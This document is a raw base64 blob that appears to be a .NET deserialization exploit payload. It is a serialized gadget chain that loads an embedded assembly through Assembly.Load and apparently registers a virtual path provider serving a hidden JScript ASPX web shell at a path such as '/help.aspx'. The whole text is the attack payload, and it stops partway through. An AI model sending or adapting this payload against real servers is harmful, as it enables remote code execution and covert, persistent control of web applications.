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wXsAKEAPwTxAPEAxgVVAOkAzgUTAAkA0gWIAAkB5wX4AOkA8QUvACEA8wATABkBGAb4AKEAJgY1ACEALwYiASEAfgE1ACEAiQE1ACEAmQE6ACEAoQFAAEkA8wBVACEA+QFGACkA8wBVAIEAPAYnASEB8wAtAWkA8wATADEA8wBVAKEAWAU4AaEAUgY+AWkAYAZDAS4ACwBRAS4AEwBaAf0AGQEeATMBSAEDAAEABQACAAYAAwAAAEEBKAAAAC0CKAAAAIACYwAAAIkCYwAAAJUCYwACAAIAAwACAA4ABQACABIABwACABMACQACABQACwAEgAAAAAAAAAAAAAAAAAAAAABUAwAABAAAAAAAAAAAAAAAAQBfAAAAAAAEAAAAAAAAAAAAAAAKAHYAAAAAAAMAAgAEAAIABQACAAYAAgAAAAA8TW9kdWxlPgA1dGRmdTF2cC5kbGwARwBteUhhbmRsZXIAU2FtcGxlUGF0aFByb3ZpZGVyAFNhbXBsZVZpcnR1YWxGaWxlAFNhbXBsZVZpcnR1YWxEaXJlY3RvcnkAbXNjb3JsaWIAU3lzdGVtAE9iamVjdABTeXN0ZW0uV2ViAElIdHRwSGFuZGxlcgBTeXN0ZW0uV2ViLlJvdXRpbmcASVJvdXRlSGFuZGxlcgBTeXN0ZW0uV2ViLkhvc3RpbmcAVmlydHVhbFBhdGhQcm92aWRlcgBWaXJ0dWFsRmlsZQBWaXJ0dWFsRGlyZWN0b3J5AC5jdG9yAGdldF9Jc1JldXNhYmxlAEh0dHBDb250ZXh0AFByb2Nlc3NSZXF1ZXN0AFJlcXVlc3RDb250ZXh0AEdldEh0dHBIYW5kbGVyAElzUmV1c2FibGUAX3ZpcnR1YWxEaXIAX2ZpbGVDb250ZW50AEluaXRpYWxpemUASXNQYXRoVmlydHVhbABGaWxlRXhpc3RzAERpcmVjdG9yeUV4aXN0cwBHZXRGaWxlAEdldERpcmVjdG9yeQBTeXN0ZW0uV2ViLkNhY2hpbmcAQ2FjaGVEZXBlbmRlbmN5AFN5c3RlbS5Db2xsZWN0aW9ucwBJRW51bWVyYWJsZQBEYXRlVGltZQBHZXRDYWNoZURlcGVuZGVuY3kAZ2V0X0V4aXN0cwBTeXN0ZW0uSU8AU3RyZWFtAE9wZW4ARXhpc3RzAEFycmF5TGlzdABjaGlsZHJlbgBnZXRfQ2hpbGRyZW4AZGlyZWN0b3JpZXMAZ2V0X0RpcmVjdG9yaWVzAGZpbGVzAGdldF9GaWxlcwBDaGlsZHJlbgBEaXJlY3RvcmllcwBGaWxlcwBjb250ZXh0AHJlcXVlc3RDb250ZXh0AHZpcnR1YWxEaXIAZmlsZUNvbnRlbnQAdmlydHVhbFBhdGgAdmlydHVhbFBhdGhEZXBlbmRlbmNpZXMAdXRjU3RhcnQAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlADV0ZGZ1MXZwAFN5c3RlbS5UZXh0AEVuY29kaW5nAGdldF9VVEY4AENvbnZlcnQARnJvbUJhc2U2NFN0cmluZwBHZXRTdHJpbmcAZ2V0X0N1cnJlbnQASHR0cFJlcXVlc3QAZ2V0X1JlcXVlc3QAZ2V0X0N1cnJlbnRFeGVjdXRpb25GaWxlUGF0aABDaGFyAFN0cmluZwBUcmltRW5kAFRvTG93ZXIAZ2V0X0FwcGxpY2F0aW9uUGF0aABJbmRleE9mAGdldF9MZW5ndGgAUmVtb3ZlAExhc3RJbmRleE9mAFN1YnN0cmluZwBDb25jYXQAUmVwbGFjZQBNYXJzaGFsQnlSZWZPYmplY3QASW5pdGlhbGl6ZUxpZmV0aW1lU2VydmljZQBTeXN0ZW0uV2ViLkNvbXBpbGF0aW9uAEJ1aWxkTWFuYWdlcgBnZXRfSXNQcmVjb21waWxlZEFwcABUeXBlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAFN5c3RlbS5SZWZsZWN0aW9uAEZpZWxkSW5mbwBCaW5kaW5nRmxhZ3MAR2V0RmllbGQAR2V0VmFsdWUAQm9vbGVhbgBTZXRWYWx1ZQBIb3N0aW5nRW52aXJvbm1lbnQAUmVnaXN0ZXJWaXJ0dWFsUGF0aFByb3ZpZGVyAG9wX0luZXF1YWxpdHkASHR0cFJlc3BvbnNlAGdldF9SZXNwb25zZQBDbGVhcgBzZXRfQnVmZmVyT3V0cHV0AEh0dHBTZXJ2ZXJVdGlsaXR5AGdldF9TZXJ2ZXIAUmFuZG9tAE5leHQASW50MzIARXhlY3V0ZQBFbmQAVG9TdHJpbmcASHR0cFV0aWxpdHkAVXJsRW5jb2RlAEFkZEhlYWRlcgBFeGNlcHRpb24AVmlydHVhbFBhdGhVdGlsaXR5AFRvQXBwUmVsYXRpdmUAQ29udGFpbnMAZ2V0X1ByZXZpb3VzAEdldEJ5dGVzAE1lbW9yeVN0cmVhbQBJc051bGxPckVtcHR5AEFkZAAAghlQAEMAVgBBAEkARgBCAGgAWgAyAFUAZwBUAEcARgB1AFoAMwBWAGgAWgAyAFUAOQBJAGsAcAB6AFkAMwBKAHAAYwBIAFEAaQBKAFQANAA4AEoAUQBwAHAAWgBpAGgAUwBaAFgARgAxAFoAWABOADAATABrAGgAbABZAFcAUgBsAGMAbgBOAGIASQBsAFoAaABiAEgAVgBsAEkAbAAwADkAUABTAEkAdwBNAEUAaABIAFEAVgBRAHoAUwB6AEIAQgBXAEUAaABXAE0AbABKAEcATQBsAGMAdwBSAHkASQBwAEMAbgBzAEsAWgBYAFoAaABiAEMAaABTAFoAWABGADEAWgBYAE4AMABMAGsAbAAwAFoAVwAxAGIASQBtAEYAdQBkAEgATgAzAGIAMwBKAGsASQBsADAAcwBJAG4AVgB1AGMAMgBGAG0AWgBTAEkAcABPAHcAawBLAGYAUQBwAGwAYgBIAE4AbABDAG4AcwBLAFUAbQBWAHoAYwBHADkAdQBjADIAVQB1AFUAbQBWAGsAYQBYAEoAbABZADMAUQBvAEkAaQA5AHYAZAAyAEUAdgBZAFgAVgAwAGEAQwA5AGwAYwBuAEoAdgBjAGsAWgBGAEwAbQBGAHoAYwBIAGcALwBhAEgAUgAwAGMARQBOAHYAWgBHAFUAOQBOAEQAQQAwAEkAaQBrADcAQwBuADAASwBKAFQANAA9AAALLgBhAHMAcAB4AAABAAMvAAAFLwAvAAAhXwB0AGgAZQBCAHUAaQBsAGQATQBhAG4AYQBnAGUAcgAAM18AaQBzAFAAcgBlAGMAbwBtAHAAaQBsAGUAZABBAHAAcABDAG8AbQBwAHUAdABlAGQAACNfAGkAcwBQAHIAZQBjAG8AbQBwAGkAbABlAGQAQQBwAHAAAA1FAHIAcgBvAHIAcwAAA1wAAAdjADoAXAAAFS8AaABlAGwAcAAuAGEAcwBwAHgAAAAA95ekoEVEs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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABA8AAAAfU3lzdGVtLlVuaXR5U2VyaWFsaXphdGlvbkhvbGRlcgMAAAAERGF0YQlVbml0eVR5cGUMQXNzZW1ibHlOYW1lAQABCAYhAAAA/gFTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAGIgAAAE5TeXN0ZW0uQ29yZSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQEAAAAAcAAAAJAwAAAAoJJAAAAAoICAAAAAAKCAgBAAAAAREAAAAPAAAABiUAAAD1AlN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQEgAAAAcAAAAJBAAAAAoJKAAAAAoICAAAAAAKCAgBAAAAARMAAAAPAAAABikAAADfA1N5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBQAAAAHAAAACQUAAAAKCSwAAAAKCAgAAAAACggIAQAAAAEVAAAADwAAAAYtAAAA5gJTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBYAAAAHAAAACQYAAAAJMAAAAAkxAAAACggIAAAAAAoICAEAAAABFwAAAA8AAAAGMgAAAO8BU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAACSIAAAAQGAAAAAcAAAAJBwAAAAoJNQAAAAoICAAAAAAKCAgBAAAAARkAAAAPAAAABjYAAAApU3lzdGVtLldlYi5VSS5XZWJDb250cm9scy5QYWdlZERhdGFTb3VyY2UEAAAABjcAAABNU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EQGgAAAAcAAAAJCAAAAAgIAAAAAAgICgAAAAgBAAgBAAgBAAgIAAAAAAEbAAAADwAAAAY5AAAAKVN5c3RlbS5Db21wb25lbnRNb2RlbC5EZXNpZ24uRGVzaWduZXJWZXJiBAAAAAY6AAAASVN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQHAAAAAUAAAANAgk7AAAACAgDAAAACQsAAAABHQAAAA8AAAAGPQAAADRTeXN0ZW0uUnVudGltZS5SZW1vdGluZy5DaGFubmVscy5BZ2dyZWdhdGVEaWN0aW9uYXJ5BAAAAAY+AAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAeAAAAAQAAAAkJAAAAEB8AAAACAAAACQoAAAAJCgAAABAgAAAAAgAAAAZBAAAAAAlBAAAABCQAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgIAAAAIRGVsZWdhdGUHbWV0aG9kMAMDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeS9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcglCAAAACUMAAAABKAAAACQAAAAJRAAAAAlFAAAAASwAAAAkAAAACUYAAAAJRwAAAAEwAAAAJAAAAAlIAAAACUkAAAABMQAAACQAAAAJSgAAAAlLAAAAATUAAAAkAAAACUwAAAAJTQAAAAE7AAAABAAAAAlOAAAACU8AAAAEQgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQZQAAAA1QFTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQnl0ZVtdLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAZSAAAAGlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5BlMAAAAETG9hZAoEQwAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgcAAAAETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpTaWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5UeXBlW10JUwAAAAk+AAAACVIAAAAGVgAAACdTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkGVwAAAC5TeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSBMb2FkKFN5c3RlbS5CeXRlW10pCAAAAAoBRAAAAEIAAAAGWAAAAMwCU3lzdGVtLkZ1bmNgMltbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JPgAAAAoJPgAAAAlSAAAABlsAAAAIR2V0VHlwZXMKAUUAAABDAAAACVsAAAAJPgAAAAlSAAAABl4AAAAYU3lzdGVtLlR5cGVbXSBHZXRUeXBlcygpBl8AAAAYU3lzdGVtLlR5cGVbXSBHZXRUeXBlcygpCAAAAAoBRgAAAEIAAAAGYAAAALYDU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGYgAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBmMAAAANR2V0RW51bWVyYXRvcgoBRwAAAEMAAAAJYwAAAAk+AAAACWIAAAAGZgAAAEVTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1N5c3RlbS5UeXBlXSBHZXRFbnVtZXJhdG9yKCkGZwAAAJQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dIEdldEVudW1lcmF0b3IoKQgAAAAKAUgAAABCAAAABmgAAADAAlN5c3RlbS5GdW5jYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5H